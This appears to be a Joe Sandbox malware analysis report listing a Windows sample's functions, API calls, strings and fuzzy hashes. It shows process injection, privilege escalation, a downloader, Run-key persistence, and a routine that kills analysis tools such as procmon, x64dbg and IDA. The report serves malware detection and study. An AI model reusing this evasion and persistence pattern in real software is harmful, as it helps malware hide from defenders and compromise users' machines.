Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
Instruction ID: b042fbb1ec5063accf7637c6b5856295701b7c6417b4f103a0cd515291ccee43
Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
Instruction Fuzzy Hash: 42C012B1F25141C3D71C9F22E495A0A2A10A745741F904028D60547744CD3DC1514F00

Function 00007FF6743D3B24 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 00007FF6743D3B42

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction ID: 1bc2cc9e907b2793fbe70929ff84efba9dc22ccb6a80da38adcf1a331ba12399
Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction Fuzzy Hash: 41D01222E38D41C2E7949B27E8CD719A3A0FFC4B45F908135E68D81564CF3CC4998F00

Non-executed Functions

Function 00007FF6743D40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6743D414B
OpenProcessToken.ADVAPI32 ref: 00007FF6743D415E
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6743D4186
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6743D41B1
CloseHandle.KERNEL32 ref: 00007FF6743D41BC
OpenProcess.KERNEL32 ref: 00007FF6743D41D1
WaitForSingleObject.KERNEL32 ref: 00007FF6743D422C
CloseHandle.KERNEL32 ref: 00007FF6743D4249

Strings

SeDebugPrivilege, xrefs: 00007FF6743D417D

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
String ID: SeDebugPrivilege
API String ID: 2379135442-2896544425
Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction ID: f8b93ecbf6992ec900655dbb7c80d44d0c646cc9b14659368d29c392386df773
Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction Fuzzy Hash: 8D413B32628A81C6E7608F52F48876AB7A0FB94765F604135EA9D87A98CF7DD448CF40

Function 00007FF6743D2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF6743D2D6F
WriteProcessMemory.KERNEL32 ref: 00007FF6743D2DC1
VirtualProtectEx.KERNEL32 ref: 00007FF6743D2DF7

Strings

@, xrefs: 00007FF6743D2D54

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Virtual$AllocMemoryProcessProtectWrite
String ID: @
API String ID: 4073123320-2766056989
Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction ID: d0c0979023834887546c6dcf3b6dce655c2ceb70823ae990bc24938c9c79dbf6
Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction Fuzzy Hash: F941B23261CB85C6E770CB16E49876AB7A0F785B94F204025EACD87B98DF7DD5448F40

Function 00007FF6743D1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF6743D1D20
Sleep.KERNEL32 ref: 00007FF6743D1D38
InternetOpenUrlW.WININET ref: 00007FF6743D1D64
InternetOpenUrlW.WININET ref: 00007FF6743D1D9B
InternetCloseHandle.WININET ref: 00007FF6743D1DB3
Sleep.KERNEL32 ref: 00007FF6743D1DBE
HttpQueryInfoA.WININET ref: 00007FF6743D1DEE
InternetCloseHandle.WININET ref: 00007FF6743D1DFD
InternetCloseHandle.WININET ref: 00007FF6743D1E08
Sleep.KERNEL32 ref: 00007FF6743D1E13
InternetCloseHandle.WININET ref: 00007FF6743D1E2D
InternetOpenUrlW.WININET ref: 00007FF6743D1E57
InternetCloseHandle.WININET ref: 00007FF6743D1E6F
Sleep.KERNEL32 ref: 00007FF6743D1E7A
HttpQueryInfoA.WININET ref: 00007FF6743D1EB2
GetProcessHeap.KERNEL32 ref: 00007FF6743D1EC1
RtlAllocateHeap.NTDLL ref: 00007FF6743D1ED7
InternetCloseHandle.WININET ref: 00007FF6743D1EEF
InternetCloseHandle.WININET ref: 00007FF6743D1EFA
InternetReadFile.WININET ref: 00007FF6743D1F37
InternetCloseHandle.WININET ref: 00007FF6743D1F6D
InternetCloseHandle.WININET ref: 00007FF6743D1F78

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6743D1D19

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
API String ID: 2307068205-2771526726
Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction ID: facf81e3f5e34c1c02651e76a0b091d37732ecd860a1911ae8743436aa39ab63
Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction Fuzzy Hash: CA71DA3652CA81C6E7508F66F49876AB760FBC87A5F601135FA8E83A68CF7CD4448F40

Function 00007FF6743D46E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6743D472B
GetFileSize.KERNEL32 ref: 00007FF6743D474C
GetProcessHeap.KERNEL32 ref: 00007FF6743D4762
RtlAllocateHeap.NTDLL ref: 00007FF6743D477B
CloseHandle.KERNEL32 ref: 00007FF6743D4793

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateHandleProcessSize
String ID:
API String ID: 2693768547-0
Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction ID: 5aa96b47f840c20a5a68339f4c15e3f92efc6ddf27d44ab3027c7b56d7b3d97c
Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction Fuzzy Hash: 6981E376618B81C6EB50CB56F48836AB7A0FBD9BA1F604135EA9D83768DF7CD0458F00

Function 00007FF6743D30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6743D45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D460C
Part of subcall function 00007FF6743D45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D4649
Part of subcall function 00007FF6743D45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3117), ref: 00007FF6743D4654

Part of subcall function 00007FF6743D3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D311C), ref: 00007FF6743D3BC7
Part of subcall function 00007FF6743D3B84: RegSetValueExW.ADVAPI32 ref: 00007FF6743D3BFD
Part of subcall function 00007FF6743D3B84: RegCloseKey.ADVAPI32 ref: 00007FF6743D3C0C

Part of subcall function 00007FF6743D3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF6743D3C3C

Part of subcall function 00007FF6743D3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6743D3E37

Part of subcall function 00007FF6743D3E24: Process32FirstW.KERNEL32 ref: 00007FF6743D3E6A
Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3E7C

Part of subcall function 00007FF6743D3E24: wcscmp.MSVCRT ref: 00007FF6743D3E91
Part of subcall function 00007FF6743D3E24: OpenProcess.KERNEL32 ref: 00007FF6743D3EA7
Part of subcall function 00007FF6743D3E24: TerminateProcess.KERNEL32 ref: 00007FF6743D3ECA
Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3ED8
Part of subcall function 00007FF6743D3E24: Process32NextW.KERNEL32 ref: 00007FF6743D3EEB
Part of subcall function 00007FF6743D3E24: CloseHandle.KERNEL32 ref: 00007FF6743D3EFD

Part of subcall function 00007FF6743D39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6743D3B0C), ref: 00007FF6743D39E4

Sleep.KERNEL32 ref: 00007FF6743D31C6

Strings

idaq.exe, xrefs: 00007FF6743D318A
x64dbg.exe, xrefs: 00007FF6743D3172
TOTALCMD.exe, xrefs: 00007FF6743D3166
procmon.exe, xrefs: 00007FF6743D31A2
idaq64.exe, xrefs: 00007FF6743D317E
Services, xrefs: 00007FF6743D31B5
ProcessHacker.exe, xrefs: 00007FF6743D3142
procexp64.exe, xrefs: 00007FF6743D315A
procexp.exe, xrefs: 00007FF6743D314E
autoruns.exe, xrefs: 00007FF6743D3196

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
API String ID: 2853470409-928700279
Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction ID: b68ff341e244665ac5caa88f001c1013bc8ff3587a5e8bf52e0f754f1165a902
Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction Fuzzy Hash: 61215867A3C942D2EA04EB66D8D91B86260AF55774FB04531E42DC21F6DF2CAA098E40

Function 00007FF6743D2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF6743D2E85
ReleaseMutex.KERNEL32 ref: 00007FF6743D2E9D
CloseHandle.KERNEL32 ref: 00007FF6743D2EA8
GetLastError.KERNEL32 ref: 00007FF6743D2EB5
ReleaseMutex.KERNEL32 ref: 00007FF6743D2EC7
CloseHandle.KERNEL32 ref: 00007FF6743D2ED2

Strings

rbNSpGEsyb, xrefs: 00007FF6743D2E70

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID: rbNSpGEsyb
API String ID: 299056699-189039185
Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction ID: 9c637bb13ebc716c8c6e56bd135419432ebee93f92f755ca5a6732f06e953cfc
Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
Instruction Fuzzy Hash: A601802791CA42C2E7349B22E89826D6770FBDCBB9F640531E94EC2674CF3CD5958E40

Function 00007FF6743D3E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6743D3E37
Process32FirstW.KERNEL32 ref: 00007FF6743D3E6A
CloseHandle.KERNEL32 ref: 00007FF6743D3E7C

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction ID: 54c05f78195089629e697d4d134e750fd102d8191ae3feb5cfc05edb06005157
Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
Instruction Fuzzy Hash: 7921CF32A2C986C2E7709B13E88C36A6360FBC4765F604235D55E825A8DF3DD855CF40

Function 00007FF6743D2F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF6743D2F1E
ReleaseMutex.KERNEL32 ref: 00007FF6743D2F36
CloseHandle.KERNEL32 ref: 00007FF6743D2F41
GetLastError.KERNEL32 ref: 00007FF6743D2F4E
ReleaseMutex.KERNEL32 ref: 00007FF6743D2F60
CloseHandle.KERNEL32 ref: 00007FF6743D2F6B

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: Mutex$CloseHandleRelease$CreateErrorLast
String ID:
API String ID: 299056699-0
Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction ID: e1af3d9a5e225d8e7919a64776b1106660b6bd228598faa0d31fa736879a5f18
Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
Instruction Fuzzy Hash: 35019E2792CA42C2E7249B23E89C26D6370FBD8B6AF600535E98EC6674CF3CD5548A40

Function 00007FF6743D3CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF6743D3D01
PathFindFileNameW.SHLWAPI ref: 00007FF6743D3D14
wcslen.MSVCRT ref: 00007FF6743D3D2A
wcsncpy.MSVCRT ref: 00007FF6743D3DEF

Strings

Unknown, xrefs: 00007FF6743D3DE0

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: FileName$FindModulePathwcslenwcsncpy
String ID: Unknown
API String ID: 4220601557-1654365787
Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction ID: 83f9c672ba7bd5d4c9acfb5d541e5f973acccc7f479c4bf569d2da135c86c9ee
Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
Instruction Fuzzy Hash: 9131A77661CAC4C6D7709B1AE4D87AAA3A0F788750F500125DA8EC3B68DF3CD554CF00

Function 00007FF6743D3B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D311C), ref: 00007FF6743D3BC7
RegSetValueExW.ADVAPI32 ref: 00007FF6743D3BFD
RegCloseKey.ADVAPI32 ref: 00007FF6743D3C0C

Strings

Hidden, xrefs: 00007FF6743D3B94
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00007FF6743D3B88

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: CloseOpenValue
String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
API String ID: 779948276-85274793
Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction ID: 8096166a96b608b783d7c9761adf647f6d3ef893d3b5ad9e49e5b5058046fbeb
Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
Instruction Fuzzy Hash: 38010C76628A80CAD7508F15F88871AB774F7887A4FA01225EB8D83B68DF7DC155CF00

Function 00007FF6743D4004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6743D4022
Process32FirstW.KERNEL32 ref: 00007FF6743D4054
wcscmp.MSVCRT ref: 00007FF6743D406B
CloseHandle.KERNEL32 ref: 00007FF6743D40A1

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
String ID:
API String ID: 2850635065-0
Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction ID: b2c8df9152c60b3c0c1c9f28a7dd570d2e0edb0630302583cb8e1740cca2c116
Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
Instruction Fuzzy Hash: 8F110072A2CA86C2F7709B12E4CC36AA3A0FB94765F604335D69D82698DF3DD504CF40

Function 00007FF6743D39B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6743D3B0C), ref: 00007FF6743D39E4
RegSetValueExW.ADVAPI32 ref: 00007FF6743D3A39
RegCloseKey.ADVAPI32 ref: 00007FF6743D3A48

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00007FF6743D39D6

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: CloseOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 779948276-1428018034
Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction ID: 0c694b6ec1756654bc65ad789f44c6112afcfbcc8fdabf6385e891a990145c7b
Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
Instruction Fuzzy Hash: 5011F476628A40C6D7908B15F48466A77A0FB847B1F605331F96E83BA8DF7CD545CF00

Function 00007FF6743D2F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6743D38C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D390D
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3922
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3935
Part of subcall function 00007FF6743D38C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3945
Part of subcall function 00007FF6743D38C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3958
